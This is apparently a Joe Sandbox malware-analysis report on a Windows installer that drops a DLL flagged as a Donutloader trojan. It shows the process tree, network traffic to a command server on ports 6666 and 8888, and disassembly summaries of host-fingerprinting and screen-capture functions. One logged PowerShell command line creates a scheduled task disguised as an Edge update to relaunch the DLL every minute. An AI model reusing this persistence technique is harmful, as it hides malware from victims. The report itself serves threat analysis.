Dec 30, 2024 23:12:24.679521084 CET	6666	49736	23.235.165.54	192.168.2.4
Dec 30, 2024 23:12:24.679529905 CET	6666	49736	23.235.165.54	192.168.2.4
Dec 30, 2024 23:12:24.679564953 CET	49736	6666	192.168.2.4	23.235.165.54
Dec 30, 2024 23:12:24.679564953 CET	49736	6666	192.168.2.4	23.235.165.54
Dec 30, 2024 23:12:24.679596901 CET	6666	49736	23.235.165.54	192.168.2.4
Dec 30, 2024 23:12:24.679615974 CET	6666	49736	23.235.165.54	192.168.2.4
Dec 30, 2024 23:12:24.679626942 CET	6666	49736	23.235.165.54	192.168.2.4
Dec 30, 2024 23:12:24.679641962 CET	49736	6666	192.168.2.4	23.235.165.54
Dec 30, 2024 23:12:24.679644108 CET	6666	49736	23.235.165.54	192.168.2.4
Dec 30, 2024 23:12:24.679656029 CET	6666	49736	23.235.165.54	192.168.2.4
Dec 30, 2024 23:12:24.679666042 CET	6666	49736	23.235.165.54	192.168.2.4
Dec 30, 2024 23:12:24.679677010 CET	6666	49736	23.235.165.54	192.168.2.4
Dec 30, 2024 23:12:24.679681063 CET	49736	6666	192.168.2.4	23.235.165.54
Dec 30, 2024 23:12:24.679688931 CET	6666	49736	23.235.165.54	192.168.2.4
Dec 30, 2024 23:12:24.679699898 CET	6666	49736	23.235.165.54	192.168.2.4
Dec 30, 2024 23:12:24.679701090 CET	49736	6666	192.168.2.4	23.235.165.54
Dec 30, 2024 23:12:24.679729939 CET	49736	6666	192.168.2.4	23.235.165.54
Dec 30, 2024 23:12:24.679770947 CET	49736	6666	192.168.2.4	23.235.165.54
Dec 30, 2024 23:12:25.718472004 CET	49737	6666	192.168.2.4	23.235.165.54
Dec 30, 2024 23:12:25.724005938 CET	6666	49737	23.235.165.54	192.168.2.4
Dec 30, 2024 23:12:25.724093914 CET	49737	6666	192.168.2.4	23.235.165.54
Dec 30, 2024 23:12:27.704850912 CET	49736	6666	192.168.2.4	23.235.165.54
Dec 30, 2024 23:12:31.021240950 CET	49737	6666	192.168.2.4	23.235.165.54
Dec 30, 2024 23:12:31.026771069 CET	6666	49737	23.235.165.54	192.168.2.4
Dec 30, 2024 23:12:31.026879072 CET	6666	49737	23.235.165.54	192.168.2.4
Dec 30, 2024 23:12:31.026887894 CET	6666	49737	23.235.165.54	192.168.2.4
Dec 30, 2024 23:12:31.026951075 CET	6666	49737	23.235.165.54	192.168.2.4
Dec 30, 2024 23:12:31.324547052 CET	6666	49737	23.235.165.54	192.168.2.4
Dec 30, 2024 23:12:31.327338934 CET	49737	6666	192.168.2.4	23.235.165.54
Dec 30, 2024 23:12:31.332113028 CET	6666	49737	23.235.165.54	192.168.2.4
Dec 30, 2024 23:12:41.905472040 CET	49737	6666	192.168.2.4	23.235.165.54
Dec 30, 2024 23:12:41.910851002 CET	6666	49737	23.235.165.54	192.168.2.4
Dec 30, 2024 23:12:42.205106020 CET	6666	49737	23.235.165.54	192.168.2.4
Dec 30, 2024 23:12:42.249051094 CET	49737	6666	192.168.2.4	23.235.165.54
Dec 30, 2024 23:12:42.266066074 CET	49737	6666	192.168.2.4	23.235.165.54
Dec 30, 2024 23:12:42.271361113 CET	6666	49737	23.235.165.54	192.168.2.4
Dec 30, 2024 23:12:58.139808893 CET	49737	6666	192.168.2.4	23.235.165.54
Dec 30, 2024 23:12:58.144824982 CET	6666	49737	23.235.165.54	192.168.2.4
Dec 30, 2024 23:12:58.441375017 CET	6666	49737	23.235.165.54	192.168.2.4
Dec 30, 2024 23:12:58.483475924 CET	49737	6666	192.168.2.4	23.235.165.54
Dec 30, 2024 23:12:58.522212982 CET	49737	6666	192.168.2.4	23.235.165.54
Dec 30, 2024 23:12:58.527076006 CET	6666	49737	23.235.165.54	192.168.2.4
Dec 30, 2024 23:13:14.549282074 CET	49737	6666	192.168.2.4	23.235.165.54
Dec 30, 2024 23:13:14.554053068 CET	6666	49737	23.235.165.54	192.168.2.4
Dec 30, 2024 23:13:14.848603964 CET	6666	49737	23.235.165.54	192.168.2.4
Dec 30, 2024 23:13:14.889743090 CET	49737	6666	192.168.2.4	23.235.165.54
Dec 30, 2024 23:13:14.943383932 CET	49737	6666	192.168.2.4	23.235.165.54
Dec 30, 2024 23:13:14.948199987 CET	6666	49737	23.235.165.54	192.168.2.4
Dec 30, 2024 23:13:30.811748028 CET	49737	6666	192.168.2.4	23.235.165.54
Dec 30, 2024 23:13:30.816698074 CET	6666	49737	23.235.165.54	192.168.2.4
Dec 30, 2024 23:13:31.112663031 CET	6666	49737	23.235.165.54	192.168.2.4
Dec 30, 2024 23:13:31.155425072 CET	49737	6666	192.168.2.4	23.235.165.54
Dec 30, 2024 23:13:31.181245089 CET	49737	6666	192.168.2.4	23.235.165.54
Dec 30, 2024 23:13:31.186037064 CET	6666	49737	23.235.165.54	192.168.2.4
Dec 30, 2024 23:13:47.546117067 CET	49737	6666	192.168.2.4	23.235.165.54
Dec 30, 2024 23:13:47.546159983 CET	49737	6666	192.168.2.4	23.235.165.54
Dec 30, 2024 23:13:47.551000118 CET	6666	49737	23.235.165.54	192.168.2.4
Dec 30, 2024 23:13:47.551137924 CET	49737	6666	192.168.2.4	23.235.165.54
Dec 30, 2024 23:13:49.484024048 CET	50004	8888	192.168.2.4	23.235.165.54
Dec 30, 2024 23:13:49.488909006 CET	8888	50004	23.235.165.54	192.168.2.4
Dec 30, 2024 23:13:49.488997936 CET	50004	8888	192.168.2.4	23.235.165.54
Dec 30, 2024 23:13:54.527590036 CET	50004	8888	192.168.2.4	23.235.165.54
Dec 30, 2024 23:13:54.532546043 CET	8888	50004	23.235.165.54	192.168.2.4
Dec 30, 2024 23:13:54.532560110 CET	8888	50004	23.235.165.54	192.168.2.4
Dec 30, 2024 23:13:54.532567978 CET	8888	50004	23.235.165.54	192.168.2.4
Dec 30, 2024 23:13:54.532768965 CET	8888	50004	23.235.165.54	192.168.2.4
Dec 30, 2024 23:13:55.056932926 CET	8888	50004	23.235.165.54	192.168.2.4
Dec 30, 2024 23:13:55.059498072 CET	50004	8888	192.168.2.4	23.235.165.54
Dec 30, 2024 23:13:55.066652060 CET	8888	50004	23.235.165.54	192.168.2.4

Target ID:	0
Start time:	17:11:54
Start date:	30/12/2024
Path:	C:\Users\user\Desktop\RXxeYma4d5.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\Desktop\RXxeYma4d5.exe"
Imagebase:	0x400000
File size:	956'899 bytes
MD5 hash:	6496951BE7839AF7461C7988DD4D324F
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	Borland Delphi
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	1
Start time:	17:11:54
Start date:	30/12/2024
Path:	C:\Users\user\AppData\Local\Temp\is-25UIU.tmp\RXxeYma4d5.tmp
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\AppData\Local\Temp\is-25UIU.tmp\RXxeYma4d5.tmp" /SL5="$10480,572569,203776,C:\Users\user\Desktop\RXxeYma4d5.exe"
Imagebase:	0x400000
File size:	1'223'168 bytes
MD5 hash:	D5A634439F2ABA0A8D26F31577C73343
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	Borland Delphi
Antivirus matches:	Detection: 4%, ReversingLabs
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	2
Start time:	17:11:54
Start date:	30/12/2024
Path:	C:\Users\user\Desktop\RXxeYma4d5.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\Desktop\RXxeYma4d5.exe" /VERYSILENT
Imagebase:	0x400000
File size:	956'899 bytes
MD5 hash:	6496951BE7839AF7461C7988DD4D324F
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	Borland Delphi
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	3
Start time:	17:11:55
Start date:	30/12/2024
Path:	C:\Users\user\AppData\Local\Temp\is-6HP8A.tmp\RXxeYma4d5.tmp
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\AppData\Local\Temp\is-6HP8A.tmp\RXxeYma4d5.tmp" /SL5="$20484,572569,203776,C:\Users\user\Desktop\RXxeYma4d5.exe" /VERYSILENT
Imagebase:	0x400000
File size:	1'223'168 bytes
MD5 hash:	D5A634439F2ABA0A8D26F31577C73343
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	Borland Delphi
Antivirus matches:	Detection: 4%, ReversingLabs
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	4
Start time:	17:11:55
Start date:	30/12/2024
Path:	C:\Windows\SysWOW64\regsvr32.exe
Wow64 process (32bit):	true
Commandline:	"regsvr32.exe" /s /i:360 C:\Users\user\AppData\Roaming\Setup_Cow.dll
Imagebase:	0xae0000
File size:	20'992 bytes
MD5 hash:	878E47C8656E53AE8A8A21E927C6F7E0
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	false

Show Windows behavior

Target ID:	5
Start time:	17:11:55
Start date:	30/12/2024
Path:	C:\Windows\System32\regsvr32.exe
Wow64 process (32bit):	false
Commandline:	/s /i:360 C:\Users\user\AppData\Roaming\Setup_Cow.dll
Imagebase:	0x7ff732dd0000
File size:	25'088 bytes
MD5 hash:	B0C2FA35D14A9FAD919E99D9D75E1B9E
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: Windows_Trojan_Donutloader_f40e3759, Description: unknown, Source: 00000005.00000002.2926694272.0000000000C57000.00000004.00000020.00020000.00000000.sdmp, Author: unknown Rule: Windows_Trojan_Donutloader_f40e3759, Description: unknown, Source: 00000005.00000002.2927165195.00000000028B0000.00000040.00000020.00020000.00000000.sdmp, Author: unknown
Reputation:	high
Has exited:	false

Show Windows behavior

Target ID:	6
Start time:	17:11:55
Start date:	30/12/2024
Path:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Wow64 process (32bit):	false
Commandline:	"powershell" -Command "if (Get-ScheduledTask \| Where-Object { $_.Actions.Execute -eq 'regsvr32' -and $_.Actions.Arguments -eq '/S /i:360 C:\Users\user\AppData\Roaming\Setup_Cow.dll' }) { exit 0 } else { exit 1 }"
Imagebase:	0x7ff788560000
File size:	452'608 bytes
MD5 hash:	04029E121A0CFA5991749937DD22A1D9
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	7
Start time:	17:11:55
Start date:	30/12/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff7699e0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	8
Start time:	17:12:05
Start date:	30/12/2024
Path:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Wow64 process (32bit):	false
Commandline:	"powershell" "Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute \"regsvr32\" -Argument \"/S /i:360 C:\Users\user\AppData\Roaming\Setup_Cow.dll\") -Trigger (New-ScheduledTaskTrigger -Once -At (Get-Date).AddMinutes(1) -RepetitionInterval (New-TimeSpan -Minutes 1)) -TaskName 'MicrosoftEdgeUpdateTaskMachineUA{8208A45D-F29A-4A60-CBD5-99028FB966B8}' -Description 'Default' -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DontStopIfGoingOnBatteries -ExecutionTimeLimit 0) -RunLevel Highest"
Imagebase:	0x7ff788560000
File size:	452'608 bytes
MD5 hash:	04029E121A0CFA5991749937DD22A1D9
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	9
Start time:	17:12:05
Start date:	30/12/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff7699e0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	10
Start time:	17:12:09
Start date:	30/12/2024
Path:	C:\Windows\System32\regsvr32.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\regsvr32.EXE /S /i:360 C:\Users\user\AppData\Roaming\Setup_Cow.dll
Imagebase:	0x7ff732dd0000
File size:	25'088 bytes
MD5 hash:	B0C2FA35D14A9FAD919E99D9D75E1B9E
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	14
Start time:	17:12:18
Start date:	30/12/2024
Path:	C:\Windows\System32\regsvr32.exe
Wow64 process (32bit):	false
Commandline:	"regsvr32" /i:360 /s C:\Users\user\AppData\Roaming\Setup_Cow.dll
Imagebase:	0x7ff732dd0000
File size:	25'088 bytes
MD5 hash:	B0C2FA35D14A9FAD919E99D9D75E1B9E
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Execution Graph

Execution Coverage:	3.2%
Dynamic/Decrypted Code Coverage:	25.4%
Signature Coverage:	49.5%
Total number of Nodes:	2000
Total number of Limit Nodes:	65

Executed Functions

Function 00007FFE013D1E80 Relevance: 199.5, APIs: 104, Strings: 8, Instructions: 3546memoryCOMMON

Download Yara Rule

APIs

HeapFree.KERNEL32 ref: 00007FFE013D2533
HeapFree.KERNEL32 ref: 00007FFE013D254E
HeapFree.KERNEL32 ref: 00007FFE013D2611

Strings

not yet implemented, xrefs: 00007FFE013D77AE
Could not read enough bytesinvalid seek to a negative or overflowing position, xrefs: 00007FFE013D701E, 00007FFE013D7043
called `Result::unwrap()` on an `Err` value, xrefs: 00007FFE013D71F3
cannot access a Thread Local Storage value during or after destructionlibrary\std\src\thread\local.rs, xrefs: 00007FFE013D77D7, 00007FFE013D7961
, xrefs: 00007FFE013D3497
Support for multi-disk files is not implemented, xrefs: 00007FFE013D792A
a Display implementation returned an error unexpectedly, xrefs: 00007FFE013D7808
Could not find central directory endInvalid digital signature header, xrefs: 00007FFE013D487C

Memory Dump Source

Source File: 00000005.00000002.2927951746.00007FFE013D1000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FFE013D0000, based on PE: true

Associated: 00000005.00000002.2927934110.00007FFE013D0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000005.00000002.2927993145.00007FFE01442000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000005.00000002.2928011168.00007FFE01443000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000005.00000002.2928011168.00007FFE01470000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000005.00000002.2928054254.00007FFE01476000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000005.00000002.2928071715.00007FFE01477000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000005.00000002.2928088613.00007FFE01478000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000005.00000002.2928105686.00007FFE0147B000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ffe013d0000_regsvr32.jbxd

Similarity

API ID: FreeHeap
String ID: $Could not find central directory endInvalid digital signature header$Could not read enough bytesinvalid seek to a negative or overflowing position$Support for multi-disk files is not implemented$a Display implementation returned an error unexpectedly$called `Result::unwrap()` on an `Err` value$cannot access a Thread Local Storage value during or after destructionlibrary\std\src\thread\local.rs$not yet implemented
API String ID: 3298025750-765076067
Opcode ID: 1d7b2182e2761ad58c92f16e71d816018ba843f35fe0d732a67517d4beeda418
Instruction ID: 7088686e016da0bfc155e754e1bafb66e8949e2001471766b6f446219e01fe1d
Opcode Fuzzy Hash: 1d7b2182e2761ad58c92f16e71d816018ba843f35fe0d732a67517d4beeda418
Instruction Fuzzy Hash: 07833A62A0DBC281EB718B15E8453AEB7A0FB84784F454136DACD4BBA9DF7CE445CB40

Function 00007FFE014102C0 Relevance: 156.5, APIs: 83, Strings: 5, Instructions: 2508memoryCOMMON

Download Yara Rule

APIs

HeapFree.KERNEL32 ref: 00007FFE014103BC
HeapFree.KERNEL32 ref: 00007FFE014104A4
HeapFree.KERNEL32 ref: 00007FFE014105C2
HeapFree.KERNEL32 ref: 00007FFE014105EC
GetEnvironmentStringsW.KERNEL32 ref: 00007FFE01410693

Strings

]?\\, xrefs: 00007FFE014112E2
.exeprogram not found, xrefs: 00007FFE01411454
\?\\, xrefs: 00007FFE014112DA
PATHlibrary\std\src\sys_common\process.rs, xrefs: 00007FFE0141282B
assertion failed: self.height > 0, xrefs: 00007FFE01413387

Memory Dump Source

Source File: 00000005.00000002.2927951746.00007FFE013D1000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FFE013D0000, based on PE: true

Associated: 00000005.00000002.2927934110.00007FFE013D0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000005.00000002.2927993145.00007FFE01442000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000005.00000002.2928011168.00007FFE01443000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000005.00000002.2928011168.00007FFE01470000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000005.00000002.2928054254.00007FFE01476000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000005.00000002.2928071715.00007FFE01477000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000005.00000002.2928088613.00007FFE01478000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000005.00000002.2928105686.00007FFE0147B000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ffe013d0000_regsvr32.jbxd

Similarity

API ID: FreeHeap$EnvironmentStrings
String ID: .exeprogram not found$PATHlibrary\std\src\sys_common\process.rs$\?\\$]?\\$assertion failed: self.height > 0
API String ID: 2767186067-2173948767
Opcode ID: 5dfce2f5da29de61abe7f0af6273d13ec3530a41eacc7bf92622ec20ad482c57
Instruction ID: 344b17b50192f5a338772b37a002f96689dc97b7486948690c3c67467fb1571e
Opcode Fuzzy Hash: 5dfce2f5da29de61abe7f0af6273d13ec3530a41eacc7bf92622ec20ad482c57
Instruction Fuzzy Hash: 12436A62A09BC288EB618F25D8407F927A1FB44B98F445136DE5D5FBB9DF7CA281C300

Function 00007FFE013D5D24 Relevance: 81.4, APIs: 44, Strings: 2, Instructions: 876memoryCOMMON

Download Yara Rule

APIs

memset.MSVCRT ref: 00007FFE013D6227
HeapCreate.KERNEL32 ref: 00007FFE013D654E
HeapAlloc.KERNEL32 ref: 00007FFE013D655E
GetLastError.KERNEL32 ref: 00007FFE013D6566
memset.MSVCRT ref: 00007FFE013D6583
HeapFree.KERNEL32 ref: 00007FFE013D7E38
HeapFree.KERNEL32 ref: 00007FFE013D8006
HeapFree.KERNEL32 ref: 00007FFE013D81FF
HeapFree.KERNEL32 ref: 00007FFE013D8220
HeapFree.KERNEL32 ref: 00007FFE013D8241
HeapFree.KERNEL32 ref: 00007FFE013D859B
HeapFree.KERNEL32 ref: 00007FFE013D87FA

Strings

assertion failed: filled <= self.buf.init/rustc/051478957371ee0084a7c0913941d2a8c4757bb9\library\core\src\io\borrowed_buf.rs, xrefs: 00007FFE013D776F
called `Result::unwrap()` on an `Err` value, xrefs: 00007FFE013D7C4F, 00007FFE013D7C99, 00007FFE013D7CE3, 00007FFE013D7D2A

Memory Dump Source

Source File: 00000005.00000002.2927951746.00007FFE013D1000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FFE013D0000, based on PE: true

Associated: 00000005.00000002.2927934110.00007FFE013D0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000005.00000002.2927993145.00007FFE01442000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000005.00000002.2928011168.00007FFE01443000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000005.00000002.2928011168.00007FFE01470000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000005.00000002.2928054254.00007FFE01476000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000005.00000002.2928071715.00007FFE01477000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000005.00000002.2928088613.00007FFE01478000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000005.00000002.2928105686.00007FFE0147B000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ffe013d0000_regsvr32.jbxd

Similarity

API ID: Heap$Free$memset$AllocCreateErrorLast
String ID: assertion failed: filled <= self.buf.init/rustc/051478957371ee0084a7c0913941d2a8c4757bb9\library\core\src\io\borrowed_buf.rs$called `Result::unwrap()` on an `Err` value
API String ID: 3318353824-3437382133
Opcode ID: 2d39b9766449fbe861dd5c32b14cd98d66fa7b6e60d1cff0775a82d85c62fa5f
Instruction ID: 2cdeef9845483a22c22423ccb0b7509e4b43789f305acf2feb15ca11ba49cf96
Opcode Fuzzy Hash: 2d39b9766449fbe861dd5c32b14cd98d66fa7b6e60d1cff0775a82d85c62fa5f
Instruction Fuzzy Hash: FCA25A62A0CBC681EB619B15F8413EAA3A1FB98784F454136DACD4BBB9DF7CE145C700

Function 02E46790 Relevance: 73.8, APIs: 29, Strings: 13, Instructions: 324
stringnetworklibraryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 02E55378: malloc.LIBCMT ref: 02E55392

gethostname.WS2_32 ref: 02E46841
gethostbyname.WS2_32 ref: 02E4684E
inet_ntoa.WS2_32 ref: 02E4686C

Part of subcall function 02E562F4: _errno.LIBCMT ref: 02E56312
Part of subcall function 02E562F4: _invalid_parameter_noinfo.LIBCMT ref: 02E5631E

Part of subcall function 02E562F4: _errno.LIBCMT ref: 02E56360

inet_ntoa.WS2_32 ref: 02E468BD
MultiByteToWideChar.KERNEL32 ref: 02E4691A
MultiByteToWideChar.KERNEL32 ref: 02E4693C
GetLastInputInfo.USER32 ref: 02E4694F
GetTickCount.KERNEL32 ref: 02E46955
wsprintfW.USER32 ref: 02E46989
MultiByteToWideChar.KERNEL32 ref: 02E469A8
MultiByteToWideChar.KERNEL32 ref: 02E469CD
GetSystemInfo.KERNEL32 ref: 02E46A05
wsprintfW.USER32 ref: 02E46A1D
GetForegroundWindow.USER32 ref: 02E46A42
GetWindowTextW.USER32 ref: 02E46A5D
lstrlenW.KERNEL32 ref: 02E46A6A
lstrlenW.KERNEL32 ref: 02E46AD9
GetModuleHandleW.KERNEL32 ref: 02E46B34
GetProcAddress.KERNEL32 ref: 02E46B44
GetNativeSystemInfo.KERNEL32 ref: 02E46B54
GetSystemInfo.KERNEL32 ref: 02E46B58
wsprintfW.USER32 ref: 02E46BA2
GetCurrentProcessId.KERNEL32 ref: 02E46BB0
GetTickCount.KERNEL32 ref: 02E46C1F
_localtime64.LIBCMT ref: 02E46C4F
wsprintfW.USER32 ref: 02E46C9B
GetLocaleInfoW.KERNEL32 ref: 02E46CB6
GetSystemDirectoryW.KERNEL32 ref: 02E46CC8
GetCurrentHwProfileW.ADVAPI32 ref: 02E46CD2

Strings

2024.12.23, xrefs: 02E46AFA
x64, xrefs: 02E46B80
x86, xrefs: 02E46B89
GROUP, xrefs: 02E46A8A
AppEvents, xrefs: 02E46A75
kernel32.dll, xrefs: 02E46B14
GetNativeSystemInfo, xrefs: 02E46B3A
REMARK, xrefs: 02E46AE6
%d min, xrefs: 02E46982
X64 %s, xrefs: 02E46B9B
X64, xrefs: 02E46D0D
Network, xrefs: 02E46A7C
1.0, xrefs: 02E46AC1

Memory Dump Source

Source File: 00000005.00000002.2927512318.0000000002E40000.00000040.00001000.00020000.00000000.sdmp, Offset: 02E40000, based on PE: true

Associated: 00000005.00000002.2927512318.0000000002E89000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_2e40000_regsvr32.jbxd

Similarity

API ID: Info$ByteCharMultiSystemWidewsprintf$CountCurrentTickWindow_errnoinet_ntoalstrlen$AddressDirectoryForegroundHandleInputLastLocaleModuleNativeProcProcessProfileText_invalid_parameter_noinfo_localtime64gethostbynamegethostnamemalloc
String ID: %d min$1.0$2024.12.23$AppEvents$GROUP$GetNativeSystemInfo$Network$REMARK$X64$X64 %s$kernel32.dll$x64$x86
API String ID: 1661628823-2134117089
Opcode ID: 122f8fed04f656ffedd24d25d979499a4dac23aeb6196086108b6fd699c96e62
Instruction ID: 9c18439f8d7c8a8e1d8e1aa584fd86fd468135f348bd9a931710c5654a420297
Opcode Fuzzy Hash: 122f8fed04f656ffedd24d25d979499a4dac23aeb6196086108b6fd699c96e62
Instruction Fuzzy Hash: 5FF19B32344A82A6EB18DF60F8483DD77B5F788788F809126DA4E53B64DF38C669C740

Function 02E515C0 Relevance: 59.8, APIs: 23, Strings: 11, Instructions: 301
sleepregistrysynchronizationCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Sleep.KERNEL32 ref: 02E51614
CloseHandle.KERNEL32 ref: 02E5164F

Part of subcall function 02E55560: _errno.LIBCMT ref: 02E5557F
Part of subcall function 02E55560: _invalid_parameter_noinfo.LIBCMT ref: 02E5558B

Part of subcall function 02E55560: _errno.LIBCMT ref: 02E555BB

GetLocalTime.KERNEL32 ref: 02E51668
wsprintfW.USER32 ref: 02E516AE
SetUnhandledExceptionFilter.KERNEL32 ref: 02E516BB
CloseHandle.KERNEL32 ref: 02E516E1
EnumWindows.USER32 ref: 02E5185A

Part of subcall function 02E55378: malloc.LIBCMT ref: 02E55392

Part of subcall function 02E5576C: _errno.LIBCMT ref: 02E55797
Part of subcall function 02E5576C: _invalid_parameter_noinfo.LIBCMT ref: 02E557A2

Sleep.KERNEL32 ref: 02E51875
EnumWindows.USER32 ref: 02E5188C
Sleep.KERNEL32 ref: 02E518CC
CreateEventA.KERNEL32 ref: 02E51921
RegOpenKeyExW.ADVAPI32 ref: 02E5198F
Sleep.KERNEL32 ref: 02E519C1
RegOpenKeyExW.ADVAPI32 ref: 02E519F5
RegQueryValueExW.ADVAPI32 ref: 02E51A22
Sleep.KERNEL32 ref: 02E51A9E
WaitForSingleObject.KERNEL32 ref: 02E51ACF
CloseHandle.KERNEL32 ref: 02E51AD8
Sleep.KERNEL32 ref: 02E51AE3

Part of subcall function 02E5576C: _getptd.LIBCMT ref: 02E557C8
Part of subcall function 02E5576C: CreateThread.KERNEL32 ref: 02E5581D
Part of subcall function 02E5576C: GetLastError.KERNEL32 ref: 02E55828
Part of subcall function 02E5576C: free.LIBCMT ref: 02E55833

WaitForSingleObject.KERNEL32 ref: 02E51B08
CloseHandle.KERNEL32 ref: 02E51B11
Sleep.KERNEL32 ref: 02E51B2B
CloseHandle.KERNEL32 ref: 02E51B42

Strings

IpDatespecial, xrefs: 02E51A16
%4d.%2d.%2d-%2d:%2d:%2d, xrefs: 02E516A0
127.0.0.1, xrefs: 02E517D1
8888, xrefs: 02E51762, 02E5178F, 02E517F5, 02E518A3, 02E518E3
8888, xrefs: 02E51783
Console, xrefs: 02E519E7
23.235.165.54, xrefs: 02E5173A, 02E517DD, 02E518B2, 02E51941
Console\1, xrefs: 02E51981
6666, xrefs: 02E51756
23.235.165.54, xrefs: 02E51777
23.235.165.54, xrefs: 02E5174A

Memory Dump Source

Source File: 00000005.00000002.2927512318.0000000002E40000.00000040.00001000.00020000.00000000.sdmp, Offset: 02E40000, based on PE: true

Associated: 00000005.00000002.2927512318.0000000002E89000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_2e40000_regsvr32.jbxd

Similarity

API ID: Sleep$CloseHandle$_errno$CreateEnumObjectOpenSingleWaitWindows_invalid_parameter_noinfo$ErrorEventExceptionFilterLastLocalQueryThreadTimeUnhandledValue_getptdfreemallocwsprintf
String ID: %4d.%2d.%2d-%2d:%2d:%2d$127.0.0.1$23.235.165.54$23.235.165.54$23.235.165.54$6666$8888$8888$Console$Console\1$IpDatespecial
API String ID: 3428909306-2695204012
Opcode ID: 34ca53d58691d4d6b77f75a5af062a653cd39c481d55b8bdfed8d27cbe8b0b01
Instruction ID: a0d4e3c6df304a0661836b94616d3c4b90ce06cef530afecbceea9d1a3286b75
Opcode Fuzzy Hash: 34ca53d58691d4d6b77f75a5af062a653cd39c481d55b8bdfed8d27cbe8b0b01
Instruction Fuzzy Hash: 06E15C326A5BD0C6EB10DF25F84839977A5F785B89F809126EE8E47AA4DF3CC544CB10

Function 02E4EBE0 Relevance: 49.3, APIs: 25, Strings: 3, Instructions: 302
windowCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetDesktopWindow.USER32 ref: 02E4EC21
GetDC.USER32 ref: 02E4EC2A
CreateCompatibleDC.GDI32 ref: 02E4EC36
GetDC.USER32 ref: 02E4EC42
GetDeviceCaps.GDI32 ref: 02E4EC53
GetDeviceCaps.GDI32 ref: 02E4EC63
ReleaseDC.USER32 ref: 02E4EC80
GetSystemMetrics.USER32 ref: 02E4EC9E
GetSystemMetrics.USER32 ref: 02E4ECD4
GetSystemMetrics.USER32 ref: 02E4ED27
GetSystemMetrics.USER32 ref: 02E4ED41
CreateCompatibleBitmap.GDI32 ref: 02E4ED5F
SelectObject.GDI32 ref: 02E4ED73
SetStretchBltMode.GDI32 ref: 02E4ED81
GetSystemMetrics.USER32 ref: 02E4ED8C
